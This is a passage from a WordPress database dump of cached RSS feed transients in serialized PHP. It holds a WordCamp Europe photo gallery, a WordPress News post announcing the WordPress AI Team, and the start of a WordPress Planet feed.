https://i0.wp.com/wordpress.org/news/files/2025/06/54571195715_0e2dbb778c_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571195715_0e2dbb778c_k.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571195715_0e2dbb778c_k.jpg?resize=1536%2C1025&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571195715_0e2dbb778c_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Maksym Kaharlytskyi</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695ced6&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695ced6\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"799\" height=\"533\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18821\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571048019_d36c78cc86_c.jpg?resize=799%2C533&#038;ssl=1\" alt=\"\" class=\"wp-image-18821\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54571048019_d36c78cc86_c.jpg?w=799&amp;ssl=1 799w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571048019_d36c78cc86_c.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54571048019_d36c78cc86_c.jpg?resize=768%2C512&amp;ssl=1 768w\" sizes=\"auto, (max-width: 799px) 100vw, 799px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Chris Clarke</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695d193&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695d193\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18820\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54570870476_a8bef84c32_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18820\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54570870476_a8bef84c32_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570870476_a8bef84c32_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570870476_a8bef84c32_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570870476_a8bef84c32_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570870476_a8bef84c32_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Atsushi Ando</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695d455&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695d455\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18819\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54570001717_fa54bba4e1_k.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18819\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54570001717_fa54bba4e1_k.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570001717_fa54bba4e1_k.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570001717_fa54bba4e1_k.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570001717_fa54bba4e1_k.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570001717_fa54bba4e1_k.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Nilo Velez</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695d6f4&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695d6f4\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18829\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54570869816_7de53cc2f1_k-1.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-18829\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/54570869816_7de53cc2f1_k-1.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570869816_7de53cc2f1_k-1.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570869816_7de53cc2f1_k-1.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570869816_7de53cc2f1_k-1.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/54570869816_7de53cc2f1_k-1.jpg?w=2048&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Jeroen Rotty</figcaption></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353695d9ac&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353695d9ac\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"18859\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0337.jpg?resize=1024%2C682&#038;ssl=1\" alt=\"\" class=\"wp-image-18859\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0337.jpg?resize=1024%2C682&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0337.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0337.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0337.jpg?resize=1536%2C1023&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/06/IMG-20250607-WA0337.jpg?w=1600&amp;ssl=1 1600w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button><figcaption class=\"wp-element-caption\">Nilo Velez</figcaption></figure>\n</figure>\n\n\n\n<p>Be sure to mark your calendars for the final major WordPress events in 2025: <a href=\"https://us.wordcamp.org/2025/\">WordCamp US</a> (Portland, Oregon, USA). Then join us in <a href=\"https://europe.wordcamp.org/2026/\">Kraków, Poland for WordCamp Europe 2026</a>! Also, if you want to get involved with WCEU, the call for organisers is already open for 2026. </p>\n\n\n\n<p></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"18776\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:57:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Announcing the Formation of the WordPress AI Team\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wordpress.org/news/2025/05/announcing-the-formation-of-the-wordpress-ai-team/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 May 2025 16:28:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=18769\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:397:\"Today, I’m pleased to announce the formation of a new WordPress AI Team, a dedicated group focused on accelerating and coordinating artificial intelligence projects across the WordPress ecosystem. AI is already transforming how people create and manage content online. As this technology evolves, it’s essential that WordPress remains at the forefront, ensuring innovation happens in [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mary Hubbard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2961:\"\n<p>Today, I’m pleased to announce the formation of a new <strong>WordPress AI Team,</strong> a dedicated group focused on accelerating and coordinating artificial intelligence projects across the WordPress ecosystem.</p>\n\n\n\n<p>AI is already transforming how people create and manage content online. As this technology evolves, it’s essential that WordPress remains at the forefront, ensuring innovation happens in the open, guided by community values, and built to core standards.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Why This Matters</h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Strategic focus</strong>: A unified team stewards AI development thoughtfully, avoids fragmentation, and ensures alignment with the long-term goals of WordPress. </li>\n\n\n\n<li><strong>Shared innovation</strong>: Contributors and companies are actively exploring AI across the ecosystem. This team provides a central place to collaborate, share ideas, and build together.</li>\n\n\n\n<li><strong>Rapid iteration</strong>: Like the Performance Team, we’ll take a plugin-first approach. <a href=\"https://make.wordpress.org/core/2022/09/11/canonical-plugins-revisited/\">Canonical Plugins</a> will allow us to move quickly, gather feedback, and deliver real value without waiting on the Core release cycle.</li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">What to Expect</h2>\n\n\n\n<p>The AI Team will:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Coordinate cross-team efforts to explore AI-powered features responsibly and inclusively.</li>\n\n\n\n<li>Publish and maintain a public roadmap of AI initiatives and Canonical Plugins.</li>\n\n\n\n<li>Collaborate closely with Core, Design, Accessibility, and other teams to ensure strong integration and shared standards.</li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Meet the Team</h2>\n\n\n\n<p>The WordPress AI Team brings deep experience in open-source, performance, and product development and a strong commitment to building AI features the WordPress way. The team will launch with the following team contributors:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>James LePage</strong> – Automattic</li>\n\n\n\n<li><strong>Felix Arntz</strong> – Google</li>\n\n\n\n<li><strong>Pascal Birchler</strong> – Google</li>\n\n\n\n<li><strong>Jeff Paul</strong> – 10up</li>\n</ul>\n\n\n\n<p>To help get things started, James and Felix will serve as the initial <a href=\"https://make.wordpress.org/updates/team-reps/\">Team Reps</a> in supporting team organization, communication, and coordination with other Make WordPress teams.</p>\n\n\n\n<p>This is an exciting and important step in WordPress’s evolution. I look forward to seeing what we’ll create together and in the open.</p>\n\n\n\n<p>If you’re interested in contributing or following along, please join the conversations in <a href=\"https://wordpress.slack.com/archives/C08TJ8BPULS\">#core-ai</a> and watch for upcoming meeting announcements on <a href=\"https://make.wordpress.org/ai/\">https://make.wordpress.org/ai/</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"18769\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:4:\"site\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"14607090\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:48:\"WpOrg\\Requests\\Utility\\CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:12:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 24 Sep 2025 02:18:47 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:4:\"vary\";s:37:\"Accept-Encoding, accept, content-type\";s:25:\"strict-transport-security\";s:12:\"max-age=3600\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Wed, 17 Sep 2025 18:47:21 GMT\";s:4:\"link\";s:63:\"<https://wordpress.org/news/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:16:\"content-encoding\";s:2:\"br\";s:7:\"alt-svc\";s:19:\"h3=\":443\"; ma=86400\";s:4:\"x-nc\";s:9:\"HIT ord 1\";}}s:5:\"build\";i:1747212062;s:21:\"cache_expiration_time\";i:1758724878;s:23:\"__cache_expiration_time\";i:1758724878;}','off'),
(98846,'_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1758724878','off'),
(98847,'_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1758681678','off'),
(98848,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1758724880','off'),
(98849,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:6:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:112:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Matt: Ruby Drama\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149923\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://ma.tt/2025/09/ruby-drama/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1035:\"<p>There is some riveting drama in the Ruby community around company sponsorships, and directory nudging similar to what happened with Advanced Custom Fields and <a href=\"https://wordpress.org/plugins/secure-custom-fields/\">Secure Custom Fields</a>. This post does the best summary: <a href=\"https://joel.drapper.me/p/rubygems-takeover/\">Shopify, pulling strings at Ruby Central, forces Bundler and RubyGems takeover</a>.</p>\n\n\n\n<p>I will only add that Automattic attempted to sponsor RailsConf and have a booth for our open web apps, such as Pocket Casts, Day One, and Beeper, which we thought would be relevant to the open source and open web audience there; however, we were denied. We&#8217;ve <a href=\"https://ma.tt/2024/12/drupalcon-singapore/\">sponsored other </a><span style=\"margin: 0px; padding: 0px;\"><a href=\"https://ma.tt/2024/12/drupalcon-singapore/\" target=\"_blank\">open-source events like DrupalCon before</a> and did so in a tasteful way that wasn&#8217;t in conflict with the organization&#8217;s mission</span>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 24 Sep 2025 00:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"Open Channels FM: Why Open Source Matters in 